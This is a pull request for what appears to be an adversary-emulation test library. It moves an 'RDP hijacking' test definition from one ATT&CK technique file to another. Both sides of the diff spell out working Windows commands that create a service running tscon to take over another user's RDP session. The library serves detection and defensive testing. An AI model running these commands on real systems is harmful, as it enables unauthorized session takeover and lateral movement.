### PR TITLE
Moved Atomic for RDP Hijacking

### DIFF
--- a/atomics/T1021.001/T1021.001.yaml
+++ b/atomics/T1021.001/T1021.001.yaml
@@ -1,30 +1,6 @@
 attack_technique: T1021.001
 display_name: 'Remote Services: Remote Desktop Protocol'
 atomic_tests:
-- name: RDP hijacking
-  auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
-  description: |
-    RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
-  supported_platforms:
-  - windows
-  input_arguments:
-    Session_ID:
-      description: The ID of the session to which you want to connect
-      type: String
-      default: "1337"
-    Destination_ID:
-      description: Connect the session of another user to a different session
-      type: String
-      default: rdp-tcp#55
-  executor:
-    command: |
-      query user
-      sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
-      net start sesshijack
-    cleanup_command: |
-      sc.exe delete sesshijack >nul 2>&1
-    name: command_prompt
-    elevation_required: true
 - name: RDPto-DomainController
   auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
   description: |

--- a/atomics/T1563.002/T1563.002.yaml
+++ b/atomics/T1563.002/T1563.002.yaml
@@ -1,0 +1,27 @@
+attack_technique: T1563.002
+display_name: 'Remote Service Session Hijacking: RDP Hijacking'
+atomic_tests:
+- name: RDP hijacking
+  auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
+  description: |
+    RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
+  supported_platforms:
+  - windows
+  input_arguments:
+    Session_ID:
+      description: The ID of the session to which you want to connect
+      type: String
+      default: "1337"
+    Destination_ID:
+      description: Connect the session of another user to a different session
+      type: String
+      default: rdp-tcp#55
+  executor:
+    command: |
+      query user
+      sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
+      net start sesshijack
+    cleanup_command: |
+      sc.exe delete sesshijack >nul 2>&1
+    name: command_prompt
+    elevation_required: true


### PR DESCRIPTION
**Details:**
Moved atomic for RDP Hijacking from T1021.001 to T11563.002. T1021.001 is for an already owned account, whereas T1563.002 is directly for Hijacking. 

**Testing:**
None needed. 

**Associated Issues:**
None.